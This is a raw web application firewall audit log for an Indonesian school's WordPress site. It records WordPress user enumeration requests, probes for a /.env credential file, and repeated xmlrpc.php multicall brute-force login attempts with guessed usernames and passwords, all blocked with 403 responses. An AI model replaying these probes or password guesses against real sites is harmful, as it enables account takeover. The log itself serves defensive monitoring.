(Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d457f033-Z-- --dd111a27-A-- [22/May/2025:19:33:12 +0700] aC8ZiH0O04WKE1HJ5iR1hQAAAAk 103.236.140.4 55388 103.236.140.4 8181 --dd111a27-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.250.42.56 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.250.42.56 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dd111a27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd111a27-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747917192236033 2488 (- - -) Stopwatch2: 1747917192236033 2488; combined=1100, p1=369, p2=674, p3=0, p4=0, p5=57, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd111a27-Z-- --ccbe7149-A-- [22/May/2025:19:57:43 +0700] aC8fRyektx75wRFPQyj-FQAAAM0 103.236.140.4 55718 103.236.140.4 8181 --ccbe7149-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 155.133.138.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.133.138.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ccbe7149-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ccbe7149-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747918663642946 3156 (- - -) Stopwatch2: 1747918663642946 3156; combined=1354, p1=475, p2=846, p3=0, p4=0, p5=33, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ccbe7149-Z-- --fe5cc638-A-- [22/May/2025:20:12:31 +0700] aC8iv2friXjg62qQwE9mKgAAAIg 103.236.140.4 56254 103.236.140.4 8181 --fe5cc638-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 Accept-Charset: utf-8 --fe5cc638-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe5cc638-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747919551462881 740 (- - -) Stopwatch2: 1747919551462881 740; combined=298, p1=260, p2=0, p3=0, p4=0, p5=38, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe5cc638-Z-- --3f175b4b-A-- [22/May/2025:20:29:03 +0700] aC8mn-ThJmFSRJ5-OZfb8wAAAFI 103.236.140.4 57160 103.236.140.4 8181 --3f175b4b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1500 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/xml --3f175b4b-C-- system.multicall methodName wp.getUsersBlogs params miswan miswan@2025 --3f175b4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f175b4b-E-- --3f175b4b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747920543811224 7624 (- - -) Stopwatch2: 1747920543811224 7624; combined=5781, p1=494, p2=5104, p3=0, p4=0, p5=112, sr=85, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f175b4b-Z-- --4905aa56-A-- [22/May/2025:20:30:06 +0700] aC8m3mfriXjg62qQwE9mfwAAAIQ 103.236.140.4 57326 103.236.140.4 8181 --4905aa56-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1492 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/xml --4905aa56-C-- system.multicall methodName wp.getUsersBlogs params miswan 007 --4905aa56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4905aa56-E-- --4905aa56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (14+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747920606525983 6494 (- - -) Stopwatch2: 1747920606525983 6494; combined=5228, p1=478, p2=4581, p3=0, p4=0, p5=100, sr=103, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4905aa56-Z-- --f2abef58-A-- [22/May/2025:20:31:17 +0700] aC8nJeThJmFSRJ5-OZfcPAAAAFM 103.236.140.4 57448 103.236.140.4 8181 --f2abef58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1495 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/xml --f2abef58-C-- system.multicall methodName wp.getUsersBlogs params miswan MISWAN --f2abef58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2abef58-E-- --f2abef58-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (6+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747920677509040 6843 (- - -) Stopwatch2: 1747920677509040 6843; combined=5222, p1=481, p2=4556, p3=0, p4=0, p5=108, sr=88, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2abef58-Z-- --10f8ed40-A-- [22/May/2025:20:32:23 +0700] aC8nZ-ThJmFSRJ5-OZfcZgAAAEU 103.236.140.4 57576 103.236.140.4 8181 --10f8ed40-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1498 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/xml --10f8ed40-C-- system.multicall methodName wp.getUsersBlogs params admin admin@2025 --10f8ed40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10f8ed40-E-- --10f8ed40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (9+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747920743495041 7121 (- - -) Stopwatch2: 1747920743495041 7121; combined=5680, p1=522, p2=4910, p3=0, p4=0, p5=150, sr=126, sw=98, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10f8ed40-Z-- --f55e4378-A-- [22/May/2025:20:33:30 +0700] aC8nquThJmFSRJ5-OZfchwAAAFQ 103.236.140.4 57682 103.236.140.4 8181 --f55e4378-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1492 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/xml --f55e4378-C-- system.multicall methodName wp.getUsersBlogs params admin pass --f55e4378-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f55e4378-E-- --f55e4378-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (8+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747920810186376 7379 (- - -) Stopwatch2: 1747920810186376 7379; combined=5588, p1=480, p2=4946, p3=0, p4=0, p5=96, sr=102, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f55e4378-Z-- --422ed533-A-- [22/May/2025:20:34:30 +0700] aC8n5uThJmFSRJ5-OZfctQAAAEk 103.236.140.4 57830 103.236.140.4 8181 --422ed533-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1493 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/xml --422ed533-C-- system.multicall methodName wp.getUsersBlogs params admin nimda --422ed533-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --422ed533-E-- --422ed533-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (11+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747920870949468 6241 (- - -) Stopwatch2: 1747920870949468 6241; combined=5163, p1=460, p2=4547, p3=0, p4=0, p5=93, sr=86, sw=63, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --422ed533-Z-- --084b8f0c-A-- [22/May/2025:20:35:47 +0700] aC8oM-ThJmFSRJ5-OZfc0wAAAEc 103.236.140.4 57952 103.236.140.4 8181 --084b8f0c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1513 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/xml --084b8f0c-C-- system.multicall methodName wp.getUsersBlogs params timkreatif timkreatiftimkreatif --084b8f0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --084b8f0c-E-- --084b8f0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (6+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747920947249573 7083 (- - -) Stopwatch2: 1747920947249573 7083; combined=5640, p1=458, p2=5012, p3=0, p4=0, p5=100, sr=87, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --084b8f0c-Z-- --aa56ce4e-A-- [22/May/2025:20:37:13 +0700] aC8oieThJmFSRJ5-OZfc8wAAAEU 103.236.140.4 58076 103.236.140.4 8181 --aa56ce4e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1508 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/xml --aa56ce4e-C-- system.multicall methodName wp.getUsersBlogs params timkreatif timkreatif@2025 --aa56ce4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa56ce4e-E-- --aa56ce4e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (3+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747921033867378 7983 (- - -) Stopwatch2: 1747921033867378 7983; combined=5875, p1=531, p2=5160, p3=0, p4=0, p5=111, sr=91, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa56ce4e-Z-- --f7638e2d-A-- [22/May/2025:20:38:13 +0700] aC8oxeThJmFSRJ5-OZfdDQAAAEo 103.236.140.4 58170 103.236.140.4 8181 --f7638e2d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1501 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/xml --f7638e2d-C-- system.multicall methodName wp.getUsersBlogs params timkreatif password --f7638e2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7638e2d-E-- --f7638e2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (7+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747921093907938 6292 (- - -) Stopwatch2: 1747921093907938 6292; combined=5064, p1=436, p2=4464, p3=0, p4=0, p5=96, sr=79, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7638e2d-Z-- --fa245670-A-- [22/May/2025:20:39:25 +0700] aC8pDeThJmFSRJ5-OZfdLQAAAEg 103.236.140.4 58290 103.236.140.4 8181 --fa245670-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1496 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/xml --fa245670-C-- system.multicall methodName wp.getUsersBlogs params timkreatif 007 --fa245670-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa245670-E-- --fa245670-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (6+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747921165260268 7363 (- - -) Stopwatch2: 1747921165260268 7363; combined=5664, p1=468, p2=5019, p3=0, p4=0, p5=106, sr=88, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa245670-Z-- --94c8ef64-A-- [22/May/2025:20:40:46 +0700] aC8pXuThJmFSRJ5-OZfdVAAAAEA 103.236.140.4 58406 103.236.140.4 8181 --94c8ef64-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1503 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/xml --94c8ef64-C-- system.multicall methodName wp.getUsersBlogs params timkreatif timkreatif --94c8ef64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94c8ef64-E-- --94c8ef64-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (8+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747921246093013 6853 (- - -) Stopwatch2: 1747921246093013 6853; combined=5192, p1=508, p2=4577, p3=0, p4=0, p5=63, sr=98, sw=44, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94c8ef64-Z-- --000b020b-A-- [22/May/2025:20:41:56 +0700] aC8ppOThJmFSRJ5-OZfdegAAAFI 103.236.140.4 58538 103.236.140.4 8181 --000b020b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1503 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/xml --000b020b-C-- system.multicall methodName wp.getUsersBlogs params kesiswaan kesiswaan@1 --000b020b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --000b020b-E-- --000b020b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (14+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747921316400753 7051 (- - -) Stopwatch2: 1747921316400753 7051; combined=5392, p1=492, p2=4717, p3=0, p4=0, p5=111, sr=97, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --000b020b-Z-- --6428d755-A-- [22/May/2025:20:42:57 +0700] aC8p4WfriXjg62qQwE9mlAAAAI8 103.236.140.4 58644 103.236.140.4 8181 --6428d755-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1501 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/xml --6428d755-C-- system.multicall methodName wp.getUsersBlogs params kesiswaan Kesiswaan --6428d755-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6428d755-E-- --6428d755-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (15+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747921377636284 6938 (- - -) Stopwatch2: 1747921377636284 6938; combined=5123, p1=538, p2=4470, p3=0, p4=0, p5=69, sr=92, sw=46, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6428d755-Z-- --40212237-A-- [22/May/2025:20:49:43 +0700] aC8rd-ThJmFSRJ5-OZfd4QAAAFc 103.236.140.4 59330 103.236.140.4 8181 --40212237-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: SonyEricssonK610i/R1CB Browser/NetFront/3.3 